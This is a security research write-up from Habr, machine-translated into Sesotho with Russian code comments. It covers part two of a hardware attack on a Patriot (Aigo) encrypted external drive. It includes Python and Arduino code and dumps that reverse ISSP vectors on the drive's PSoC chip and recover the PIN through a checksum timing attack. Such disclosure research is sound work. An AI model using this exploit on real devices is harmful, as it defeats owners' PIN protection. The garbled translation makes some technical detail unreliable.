Ena ke karolo ea bobeli le ea ho qetela ea sengoloa se buang ka ho qhekella li-drive tsa kantle tse ipatileng. E-re ke u hopotse hore mosebetsi-'moho o sa tsoa ntlisetsa Patriot (Aigo) SK8671 hard drive, 'me ke entse qeto ea ho e khutlisa,' me hona joale ke arolelana se tsoang ho eona. Pele u bala ho ea pele, etsa bonnete ba hore ua bala Lingoloa.
4. Re qala ho nka lahla ho tloha ka hare ho PSoC flash drive
Kahoo, ntho e 'ngoe le e' ngoe e bontša (joalokaha re thehile [karolong ea pele]()) hore PIN khoutu e bolokiloe botebong ba flash ea PSoC. Ka hona, re hloka ho bala botebo bona ba flash. Pele ho mosebetsi o hlokahalang:
- nka taolo ea "puisano" le microcontroller;
- fumana mokhoa oa ho hlahloba hore na "puisano" ena e sirelelitsoe ho bala ho tsoa ka ntle;
- fumana mokhoa oa ho qoba tšireletso.
Ho na le libaka tse peli moo ho utloahalang ho batla PIN khoutu e nepahetseng:
- memori ea flash e ka hare;
- SRAM, moo phini khoutu e ka bolokoang ho e bapisa le khoutu ea phini e kentsoeng ke mosebelisi.
Ha ke sheba pele, ke tla hlokomela hore ke ntse ke khona ho lahla flash drive ea kahare ea PSoC - ho feta sistimi ea eona ea ts'ireletso ke sebelisa tlhaselo ea Hardware e bitsoang "cold boot tracing" - kamora ho khutlisa bokhoni bo sa ngolisoang ba protocol ea ISSP. Sena se ile sa ntumella ho lahla PIN khoutu ea 'nete.
$ ./psoc.py
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9Khouto ea ho qetela ea lenaneo:
- ;
- .
5. protocol ea ISSP
5.1. ISSP ke eng
"Puisano" e nang le microcontroller e ka bolela lintho tse fapaneng: ho tloha "morekisi ho ea ho morekisi" ho ea ho sebelisana le protocol ea serial (mohlala, ICSP bakeng sa PIC ea Microchip).
Cypress e na le protocol ea eona ea thepa bakeng sa sena, e bitsoang ISSP (in-system serial programming protocol), e hlalosoang ka mokhoa o itseng ho . e boetse e fana ka lintlha tse ling. Ho boetse ho na le e tšoanang le OpenSource e bitsoang HSSP (re tla e sebelisa nakoana hamorao). ISSP e sebetsa ka tsela e latelang:
- qala hape PSoC;
- hlahisa nomoro ea boselamose ho pini ea data ea serial ea PSoC ena; ho kenya mokhoa oa ho etsa mananeo a kantle;
- romela litaelo, e leng likhoele tse telele tse bitsoang "vectors".
Litokomane tsa ISSP li hlalosa li-vector tsena bakeng sa litaelo tse fokolang feela:
- Qala-1
- Qala-2
- Qala-3 (likhetho tsa 3V le 5V)
- ID-PETA
- THABANG-ID-LENTSOE
- SET-BLOCK-NUM: 10011111010dddddddd111, moo dddddddd=block #
- HLAKOLA LEBAKA
- LEANO-THIBALA
- TIISETSA-PEPO
- BALA-BYTE: 10110aaaaaZDDDDDDDDZ1, moo DDDDDDDD = data out, aaaaaa = aterese (6 bits)
- NGOLA-BYTE: 10010aaaaaaddddddd111, moo dddddddd = data ho, aaaaaa = aterese (6 bits)
- SIRELETSA
- TŠEBELETSO-PEKO
- BALA-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDDDZ1, moo DDDDDDDDDDDDDDDDDD = data out: device checksum
- HLALISA THIBELA
Mohlala, vector ea Initialize-2:
1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111Li-vector tsohle li na le bolelele bo lekanang: li-bits tse 22. Litokomane tsa HSSP li na le tlhaiso-leseling e eketsehileng ho ISSP: "Vector ea ISSP ha se letho haese tatellano e nyane e emelang sehlopha sa litaelo."
5.2. Li-Vector tse nyenyefatsang
A re bone hore na ho etsahalang mona. Qalong, ke ne ke nahana hore li-vector tsena e ne e le mefuta e sa tšoaneng ea litaelo tsa M8C, empa ka mor'a ho hlahloba khopolo-taba ena, ke ile ka fumana hore li-opcode tsa ts'ebetso ha li lumellane.
Eaba ke google vector e ka holimo mme ka kopana phuputso eo ho eona mongoli, le hoja a sa qaqise, a faneng ka malebela a mang a molemo: “Taelo ka ’ngoe e qala ka likotoana tse tharo tse lumellanang le e ’ngoe ea li-mnemonics tse ’nè (e baloang ho tloha ho RAM, ho ngolla RAM, buka ea ho bala, tlaleho ea ho ngola). Joale ho na le liaterese tse 8, tse lateloang ke lintlha tse 8 tsa data (bala kapa u ngole) 'me qetellong li-stop bits tse tharo."
Joale ke ile ka khona ho fumana boitsebiso bo molemo haholo karolong ea Supervisory ROM (SROM). . SROM ke ROM e nang le likhoutu tse thata ho PSoC e fanang ka lits'ebetso tsa ts'ebeliso (ka tsela e ts'oanang le Syscall) bakeng sa khoutu ea lenaneo e sebetsang sebakeng sa mosebelisi:
- 00h: SWBootReset
- 01h: ReadBlock
- 02h: WriteBlock
- 03h: EraseBlock
- 06h: TafoleBala
- 07h: CheckSum
- 08h: Lekanya0
- 09h: Lekanya1
Ka ho bapisa mabitso a li-vector le mesebetsi ea SROM, re ka 'mapa lits'ebetso tse fapaneng tse tšehetsoeng ke protocol ena ho li-parameter tsa SROM tse lebelletsoeng. Ka lebaka la sena, re ka khetholla likaroloana tse tharo tsa pele tsa li-vector tsa ISSP:
- 100 => "khutla"
- 101 => “rdmem”
- 110 => "ho senya"
- 111 => "reg"
Leha ho le joalo, kutloisiso e felletseng ea lits'ebetso tsa on-chip e ka fumaneha feela ka puisano e tobileng le PSoC.
5.3. Puisano le PSoC
Kaha Dirk Petrautsky o se a ntse a le teng Khoutu ea Cypress ea HSSP ho Arduino, ke sebelisitse Arduino Uno ho hokela sehokelo sa ISSP sa boto ea keyboard.
Ka kopo hlokomela hore nakong ea lipatlisiso tsa ka, ke ile ka fetola khoutu ea Dirk hanyane. U ka fumana phetoho ea ka ho GitHub: le sengoloa se tsamaellanang sa Python bakeng sa ho buisana le Arduino, sebakeng sa ka sa polokelo .
Kahoo, ha ke sebelisa Arduino, ke ile ka qala ka ho sebelisa li-vector tsa "molao" bakeng sa "puisano". Ke lekile ho bala ROM e ka hare ke sebelisa taelo ea VERIFY. Joalokaha ho ne ho lebelletsoe, ha kea ka ka khona ho etsa sena. Mohlomong ka lebaka la hore li-bits tsa ts'ireletso tsa ho bala li kentsoe kahare ho flash drive.
Eaba ke iketsetsa li-vector tsa ka tse bonolo bakeng sa ho ngola le ho bala memori/register. Ka kopo hlokomela hore re ka bala SROM kaofela le hoja flash drive e sirelelitsoe!
5.4. Boitsebiso ba li-on-chip registers
Ka mor'a ho sheba li-vector tse "qhaqhoang", ke ile ka fumana hore sesebelisoa se sebelisa li-registering tse sa ngolisoang (0xF8-0xFA) ho hlakisa li-opcode tsa M8C, tse etsoang ka ho toba, li feta tšireletso. Sena se ile sa ntumella ho tsamaisa li-opcode tse fapaneng joalo ka "ADD", "MOV A, X", "PUSH" kapa "JMP". Kea ba leboha (ka ho sheba litla-morao tseo ba nang le tsona ho li-registas) ke ile ka khona ho fumana hore na ke life tsa li-registas tse sa ngolisoang e neng e hlile e le li-registas tse tloaelehileng (A, X, SP le PC).
Ka lebaka leo, khoutu ea "disassembled" e hlahisoang ke sesebelisoa sa HSSP_disas.rb e shebahala tjena (ke kentse litlhaloso bakeng sa ho hlaka):
--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00 # сброс флагов
[DE C0 1C] wrreg SP (f6), 0x00 # сброс SP
[9F 07 5C] wrmem KEY1, 0x3A # обязательный аргумент для SSC
[9F 20 7C] wrmem KEY2, 0x03 # аналогично
[DE A0 1C] wrreg PCh (f5), 0x00 # сброс PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03 # (LSB) ... до 3 ??
[9F 70 1C] wrmem POINTER, 0x80 # RAM-указатель для выходных данных
[DF 26 1C] wrreg opc1 (f9), 0x30 # Опкод 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40 # Опкод 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01 # BLOCK ID для вызова SSC
[DE 00 DC] wrreg A (f0), 0x06 # номер "Syscall" : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00 # Опкод для SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12 # Недокумментированная операция: выполнить внешний опкод
5.5. Likotoana tsa ts'ireletso
Mothating ona ke se ke ntse ke khona ho buisana le PSoC, empa ke ntse ke se na leseli le tšepahalang mabapi le likarolo tsa ts'ireletso tsa flash drive. Ke ile ka makatsoa haholo ke taba ea hore Cypress ha e fane ka mosebelisi oa sesebelisoa mokhoa leha e le ofe oa ho hlahloba hore na tšireletso e sebetsa. Ke ile ka cheka ka botebo ho Google hore qetellong ke utloisise hore khoutu ea HSSP e fanoeng ke Cypress e ile ea ntlafatsoa ka mor'a hore Dirk a lokolle phetoho ea hae. Me, ea ba! Vector ena e ncha e hlahile:
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # неизвестные аргументы
[9F E0 1C] wrmem 0xFF, 0x00 # аналогично
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10 # недокументированный syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Ka ho sebelisa vector ena (bona read_security_data ho psoc.py), re fumana likaroloana tsohle tsa ts'ireletso ho SRAM ho 0x80, moo ho nang le li-bits tse peli sebakeng se seng le se seng se sirelelitsoeng.
Phello e nyahamisa: ntho e 'ngoe le e' ngoe e sirelelitsoe ka mokhoa oa "thibela ho bala le ho ngola ka ntle". Ka hona, ha se feela hore re ke ke ra bala letho ho tsoa ho flash drive, empa re ke ke ra ngola letho (mohlala, ho kenya dumper ea ROM moo). 'Me tsela e le' ngoe feela ea ho thibela tšireletso ke ho hlakola chip eohle ka ho feletseng. 🙁
6. Tlhaselo ea pele (e hlōlehileng): ROMX
Leha ho le joalo, re ka leka leqheka le latelang: kaha re na le bokhoni ba ho etsa li-opcode tse sa reroang, ke hobane'ng ha re sa phethise ROMX, e sebelisetsoang ho bala memori ea flash? Mokhoa ona o na le monyetla o motle oa ho atleha. Hobane tšebetso ea ReadBlock e balang data ho tsoa ho SROM (e sebelisoang ke li-vector) e hlahloba hore na e bitsoa ho tsoa ho ISSP. Leha ho le joalo, opcode ea ROMX e kanna ea se be le cheke e joalo. Kahoo khoutu ea Python ke ena (kamora ho kenyelletsa lihlopha tse 'maloa tsa bathusi ho khoutu ea Arduino):
for i in range(0, 8192):
write_reg(0xF0, i>>8) # A = 0
write_reg(0xF3, i&0xFF) # X = 0
exec_opcodes("x28x30x40") # ROMX, HALT, NOP
byte = read_reg(0xF0) # ROMX reads ROM[A|X] into A
print "%02x" % ord(byte[0]) # print ROM byteKa bomalimabe, khoutu ena ha e sebetse. 🙁 Kapa ho e-na le hoo e ea sebetsa, empa ka tlhahiso re fumana li-opcode tsa rona (0x28 0x30 0x40)! Ha ke nahane hore ts'ebetso e ts'oanang ea sesebelisoa ke karolo ea ts'ireletso ea ho bala. Sena se tšoana le leqheka la boenjiniere: ha o sebelisa li-opcode tsa kantle, bese ea ROM e fetisetsoa ho buffer ea nakoana.
7. Tlhaselo ea Bobeli: Cold Boot Tracing
Kaha leqheka la ROMX ha lea ka la sebetsa, ke ile ka qala ho nahana ka phapang e 'ngoe ea leqheka lena - e hlalositsoeng khatisong. .
7.1. Phethahatso
Litokomane tsa ISSP li fana ka vector e latelang bakeng sa CHECKSUM-SETUP:
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Ha e le hantle sena se bitsa ts'ebetso ea SROM 0x07, joalo ka ha e hlahisoa tokomaneng (moepo o tšekaletseng):
Netefatso ea ts'ebetso ena. E bala cheke ea 16-bit ea palo ea li-blocks tse boletsoeng ke basebelisi bankeng e le 'ngoe ea flash, ho qala ho zero. BLOCKID parameter e sebelisetsoa ho fetisa palo ea li-blocks tse tla sebelisoa ha ho baloa checksum. Boleng ba "1" bo tla kopanya checksum bakeng sa block zero; athe "0" e tla etsa hore kakaretso ea cheke ea li-block tse 256 tsa flash bank e baloe. Chequesum ea 16-bit e khutlisoa ka KEY1 le KEY2. Paramethara ea KEY1 e boloka li-bits tse 8 tse tlase tsa cheke, 'me parameter ea KEY2 e boloka li-bits tse 8 tse holimo. Bakeng sa lisebelisoa tse nang le libanka tse 'maloa tsa flash, mosebetsi oa checksum o bitsoa bakeng sa e' ngoe le e 'ngoe ka thoko. Nomoro ea banka eo e tla sebetsa ka eona e behiloe ke ngoliso ea FLS_PR1 (ka ho beha bitana ho eona e tsamaellanang le banka ea flash).
Hlokomela hore ena ke checksum e bonolo: li-byte li kenyelletsoa feela ka mor'a tse ling; ha ho na li-quirks tse majabajaba tsa CRC. Ntle le moo, ka ho tseba hore mantlha ea M8C e na le lethathamo le lenyenyane haholo la lirekoto, ke ile ka nahana hore ha ho baloa cheke, litekanyetso tsa mahareng li tla ngoloa ka mefuta e ts'oanang e tla qetella e fihletse tlhahiso: KEY1 (0xF8) / KEY2 ( 0xF9).
Kahoo ka mohopolo tlhaselo ea ka e shebahala tjena:
- Re hokela ka ISSP.
- Re qala lipalo tsa cheke re sebelisa vector ea CHECKSUM-SETUP.
- Re qala processor ka mor'a nako e behiloeng T.
- Re bala RAM ho fumana cheke ea hajoale ea C.
- Pheta mehato ea 3 le ea 4, u eketsa T hanyane nako le nako.
- Re khutlisa data ho tsoa ho flash drive ka ho tlosa cheke ea C e fetileng ho ea hajoale.
Leha ho le joalo, ho na le bothata: Vector ea Initialize-1 eo re tlamehang ho e romela ka mor'a hore re e qale, e hlakola KEY1 le KEY2:
1100101000000000000000 # Магия, переводящая PSoC в режим программирования
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # контрольная сумма перезаписывается здесь
[9F 20 7C] wrmem KEY2, 0x03 # и здесь
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09 # SROM-функция 9
[DF 00 1C] wrreg opc0 (f8), 0x00 # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Khoutu ena e hlakola cheke ea rona ea bohlokoa ka ho letsetsa Calibrate1 (ts'ebetso ea SROM 9)... Mohlomong re ka romella nomoro ea boselamose (ho tloha qalong ea khoutu e kaholimo) ho kenya mokhoa oa lenaneo, ebe o bala SRAM? E, e ea sebetsa! Khoutu ea Arduino e sebelisang tlhaselo ena e bonolo haholo:
case Cmnd_STK_START_CSUM:
checksum_delay = ((uint32_t)getch())<<24;
checksum_delay |= ((uint32_t)getch())<<16;
checksum_delay |= ((uint32_t)getch())<<8;
checksum_delay |= getch();
if(checksum_delay > 10000) {
ms_delay = checksum_delay/1000;
checksum_delay = checksum_delay%1000;
}
else {
ms_delay = 0;
}
send_checksum_v();
if(checksum_delay)
delayMicroseconds(checksum_delay);
delay(ms_delay);
start_pmode();- Bala checkum_delay.
- Etsa lipalo tsa checksum (send_checksum_v).
- Ema ka nako e behiloeng; ho nahanoa ka liphoso tse latelang:
- Ke sentse nako e ngata ho fihlela ke fumana hore na ho etsahala eng e sebetsa ka nepo feela ka tieho e sa feteng 16383 μs;
- mme hape ke bolaile nako e lekanang ho fihlela ke fumana hore delayMicroseconds, haeba 0 e fetisetsoa ho eona joalo ka kenyelletso, e sebetsa ka mokhoa o fosahetseng ka botlalo!
- Qala hape PSoC ka mokhoa oa ho etsa mananeo (re romella feela nomoro ea boselamose, ntle le ho romela li-vector tsa ho qala).
Khoutu ea ho qetela ho Python:
for delay in range(0, 150000): # задержка в микросекундах
for i in range(0, 10): # количество считывания для каждойиз задержек
try:
reset_psoc(quiet=True) # перезагрузка и вход в режим программирования
send_vectors() # отправка инициализирующих векторов
ser.write("x85"+struct.pack(">I", delay)) # вычислить контрольную сумму + перезагрузиться после задержки
res = ser.read(1) # считать arduino ACK
except Exception as e:
print e
ser.close()
os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # открыть последовательный порт
continue
print "%05d %02X %02X %02X" % (delay, # считать RAM-байты
read_regb(0xf1),
read_ramb(0xf8),
read_ramb(0xf9))Ka bokhutšoanyane, seo khoutu ena e se etsang:
- E tsosolosa PSoC ('me e e romelle nomoro ea boselamose).
- E romella li-vector tse felletseng tsa ho qala.
- E letsetsa tšebetso ea Arduino Cmnd_STK_START_CSUM (0x85), moo tieho ea li-microseconds e fetisoang joalo ka paramethara.
- E bala cheke (0xF8 le 0xF9) le rejisetara e sa ngolisoang 0xF1.
Khoutu ena e etsoa makhetlo a 10 ho microsecond e le 'ngoe. 1xF0 e kenyelelitsoe mona hobane e ne e le eona feela ngoliso e ileng ea fetoha ha ho baloa cheke. Mohlomong ke mofuta o mong oa phetoho ea nakoana e sebelisoang ke yuniti ea logic ea arithmetic. Ela hloko hack e mpe eo ke e sebelisang ho seta Arduino bocha ke sebelisa picocom ha Arduino e emisa ho bonts'a matšoao a bophelo (ha ho na lebaka).
7.2. Ho bala sephetho
Sephetho sa sengoloa sa Python se shebahala tjena (se nolofalitsoeng hore se balehe):
DELAY F1 F8 F9 # F1 – вышеупомянутый неизвестный регистр
# F8 младший байт контрольной суммы
# F9 старший байт контрольной суммы
00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00 # контрольная сумма сбрасывается в 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00 # 1-й байт: 0x0080-0x0000 = 0x80
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00 # 2-й байт: 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01 # понятия не имею, что здесь происходит
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00 # Снова E7?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00 # Хмммммм
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01 # А, дошло! Вот он же перенос в старший байт
00063 01 17 01
[...]
00075 CC 17 01 # Итак, 0x117-0xE7: 0x30Ha ho buuoa joalo, re na le bothata: kaha re sebetsa ka cheke ea 'nete, null byte ha e fetole boleng bo baloang. Leha ho le joalo, kaha ts'ebetso eohle ea lipalo (8192 byte) e nka metsotsoana e 0,1478 (ka liphetoho tse fokolang nako le nako ha e tsamaisoa), e lekanang le hoo e ka bang 18,04 μs ka byte, re ka sebelisa nako ena ho hlahloba boleng ba checksum ka linako tse loketseng. Bakeng sa mabelo a pele, ntho e 'ngoe le e' ngoe e baloa habonolo, kaha nako ea ts'ebetso ea computational e lula e batla e tšoana. Leha ho le joalo, pheletso ea thotobolo ena ha ea nepahala hobane "liphapang tse nyane tsa nako" papaling e 'ngoe le e' ngoe li eketsa ho ba tsa bohlokoa:
134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DDKe likheo tse 10 bakeng sa tieho e 'ngoe le e 'ngoe ea microsecond. Nako eohle ea ts'ebetso ea ho lahla li-byte tsohle tse 8192 tsa flash drive ke lihora tse 48.
7.3. Flash binary reconstruction
Ha ke e-s'o qete ho ngola khoutu e tla tsosolosa ka ho feletseng khoutu ea lenaneo la flash drive, ho ela hloko ho kheloha ha nako eohle. Leha ho le joalo, ke se ke tsosolositse qalo ea khoutu ena. Ho etsa bonnete ba hore ke e entse ka nepo, ke e harotse ka m8cdis:
0000: 80 67 jmp 0068h ; Reset vector
[...]
0068: 71 10 or F,010h
006a: 62 e3 87 mov reg[VLT_CR],087h
006d: 70 ef and F,0efh
006f: 41 fe fb and reg[CPU_SCR1],0fbh
0072: 50 80 mov A,080h
0074: 4e swap A,SP
0075: 55 fa 01 mov [0fah],001h
0078: 4f mov X,SP
0079: 5b mov A,X
007a: 01 03 add A,003h
007c: 53 f9 mov [0f9h],A
007e: 55 f8 3a mov [0f8h],03ah
0081: 50 06 mov A,006h
0083: 00 ssc
[...]
0122: 18 pop A
0123: 71 10 or F,010h
0125: 43 e3 10 or reg[VLT_CR],010h
0128: 70 00 and F,000h ; Paging mode changed from 3 to 0
012a: ef 62 jacc 008dh
012c: e0 00 jacc 012dh
012e: 71 10 or F,010h
0130: 62 e0 02 mov reg[OSC_CR0],002h
0133: 70 ef and F,0efh
0135: 62 e2 00 mov reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff jmp 013bh
013d: 50 08 mov A,008h
013f: 7f retHo bonahala ho utloahala!
7.4. Ho fumana aterese ea polokelo ea PIN
Kaha joale re khona ho bala cheke ka linako tseo re li hlokang, re ka sheba habonolo hore na e fetoha joang le hore na e fetoha hokae ha re:
- kenya PIN khoutu e fosahetseng;
- fetola pin code.
Taba ea pele, ho fumana aterese ea polokelo e hakanyetsoang, ke ile ka nka lahla ea checksum ka 10 ms increments ka mor'a ho qala bocha. Eaba ke kenya PIN e fosahetseng mme ka etsa joalo.
Phello e ne e se monate haholo, kaha ho bile le liphetoho tse ngata. Empa qetellong ke ile ka khona ho fumana hore chequesum e fetohile kae-kae pakeng tsa 120000 µs le 140000 µs ea ho lieha. Empa "pincode" eo ke e bonts'itseng moo e ne e fosahetse ka botlalo - ka lebaka la ts'ebetso ea ho lieha Microseconds, e etsang lintho tse makatsang ha 0 e fetisetsoa ho eona.
Joale, kamora ho qeta lihora tse ka bang 3, ke ile ka hopola hore mohala oa sistimi ea SROM CheckSum o amohela khang e le kenyelletso e hlalosang palo ea li-blocks bakeng sa cheke! Seo. re ka beha habonolo aterese ea polokelo ea khoutu ea PIN le k'haontareng ea "maiteko a fosahetseng", ka ho nepahala ho fihla ho boloko ba 64-byte.
Mehato ea ka ea pele e hlahisitse sephetho se latelang:
Eaba ke fetola PIN khoutu ho tloha "123456" ho "1234567" mme ka fumana:
Kahoo, khoutu ea PIN le k'hamphani ea liteko tse fosahetseng li bonahala li bolokiloe ho thibela No. 126.
7.5. Ho nka thotobolo ea boloko No. 126
Block #126 e lokela ho ba kae-kae hoo e ka bang 125x64x18 = 144000μs, ho tloha qalong ea lipalo tsa checksum, thotobolong ea ka e felletseng, 'me e shebahala e utloahala. Joale, ka mor'a ho sefa lithōle tse ngata tse sa sebetseng ka letsoho (ka lebaka la ho bokellana ha "liphapang tse nyane tsa nako"), ke ile ka qetella ke fumane li-byte tsena (ka latency ea 145527 μs):
Ho hlakile hore PIN khoutu e bolokiloe ka mokhoa o sa ngolisoang! Litekanyetso tsena, ehlile, ha lia ngoloa ka likhoutu tsa ASCII, empa joalo ka ha ho le joalo, li bonts'a lipalo tse nkiloeng ho keyboard ea capacitive.
Qetellong, ke ile ka etsa liteko tse ling ho fumana moo ho bolokiloeng counter ea liteko tse mpe. Sephetho ke sena:
0xFF - e bolela "maiteko a 15" mme e fokotseha ka boiteko bo bong le bo bong bo hlōlehileng.
7.6. Phoso ea khoutu ea PIN
Khoutu ea ka e mpe ke ena e kopanyang tse kaholimo:
def dump_pin():
pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
last_csum = 0
pin_bytes = []
for delay in range(145495, 145719, 16):
csum = csum_at(delay, 1)
byte = (csum-last_csum)&0xFF
print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
pin_bytes.append(byte)
last_csum = csum
print "PIN: ",
for i in range(0, len(pin_bytes)):
if pin_bytes[i] in pin_map:
print pin_map[pin_bytes[i]],
printLiphetho tsa ts'ebetso ea eona ke tsena:
$ ./psoc.py
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9Hooray! E sebetsa!
Ka kopo elelloa hore litekanyetso tsa latency tseo ke li sebelisitseng li kanna tsa sebetsa ho PSoC e le 'ngoe - eo ke e sebelisitseng.
8. Ho latela eng?
Kahoo, ha re akaretseng lehlakore la PSoC, maemong a koloi ea rona ea Aigo:
- re ka bala SRAM le haeba e baloa e sirelelitsoe;
- Re ka qoba tšireletso ea anti-swipe ka ho sebelisa tlhaselo e batang ea boot trace le ho bala khoutu ea PIN ka kotloloho.
Leha ho le joalo, tlhaselo ea rona e na le mefokolo e itseng ka lebaka la mathata a ho hokahanya. E ka ntlafatsoa ka tsela e latelang:
- ngola sesebelisoa sa ho khetholla ka nepo data ea tlhahiso e fumanoang ka lebaka la tlhaselo ea "cold boot trace";
- sebelisa sesebelisoa sa FPGA ho theha tieho ea nako e nepahetseng haholoanyane (kapa sebelisa lisebelisoa tsa Arduino hardware);
- leka tlhaselo e 'ngoe: kenya PIN khoutu e fosahetseng ka boomo, qala hape 'me u lahlele RAM, ka tšepo ea hore PIN khoutu e nepahetseng e tla bolokoa ho RAM bakeng sa papiso. Leha ho le joalo, sena ha se bonolo ho se etsa ho Arduino, kaha boemo ba pontšo ea Arduino ke 5 volts, ha boto eo re e hlahlobang e sebetsa ka matšoao a 3,3 volt.
Ntho e 'ngoe e khahlisang e ka lekoang ke ho bapala ka boemo ba voltage ho feta tšireletso e baloang. Haeba mokhoa ona o sebetsa, re ka khona ho fumana lintlha tse nepahetseng ho tsoa ho flash drive - ho fapana le ho itšetleha ka ho bala cheke e nang le tieho e sa nepahalang ea nako.
Kaha mohlomong SROM e bala likotoana tsa balebeli ka mohala oa sistimi ea ReadBlock, re ka etsa se tšoanang ho blog ea Dmitry Nedospasov - ts'ebetsong hape ea tlhaselo ea Chris Gerlinski, e phatlalalitsoeng kopanong. .
Ntho e 'ngoe e monate e ka etsoang ke ho hlakola nyeoe ho tsoa ho chip: ho nka thotobolo ea SRAM, ho tsebahatsa mehala ea sistimi e sa ngolisoang le bofokoli.
9. Qetello
Kahoo, tšireletso ea koloi ena e siea lintho tse ngata tse lakatsehang, hobane e sebelisa "microcontroller" e tloaelehileng (eseng "e thata") ho boloka khoutu ea PIN ... Ho feta moo, ha ke e-s'o shebe (leha ho le joalo) hore na lintho li tsamaea joang le data. encryption sesebelisoa sena!
U ka khothaletsa eng bakeng sa Aigo? Kamora ho sekaseka mefuta e 'maloa ea li-drive tsa HDD tse patiloeng, ka 2015 ke ile ka etsa ho SyScan, moo a ileng a hlahloba mathata a ts'ireletso ea li-drive tse 'maloa tsa kantle tsa HDD, mme a etsa likhothaletso mabapi le se ka ntlafatsoang ho tsona. 🙂
Ke qetile mafelo-beke a mabeli le mantsiboea a 'maloa ke etsa lipatlisiso tsena. Kakaretso ea lihora tse ka bang 40. Ho bala ho tloha qalong (ha ke bula disk) ho fihlela qetellong (ho lahla khoutu ea PIN). Lihora tse tšoanang tsa 40 li kenyelletsa nako eo ke e qetileng ke ngola sehlooho sena. E ne e le leeto le monate haholo.
Source: www.habr.com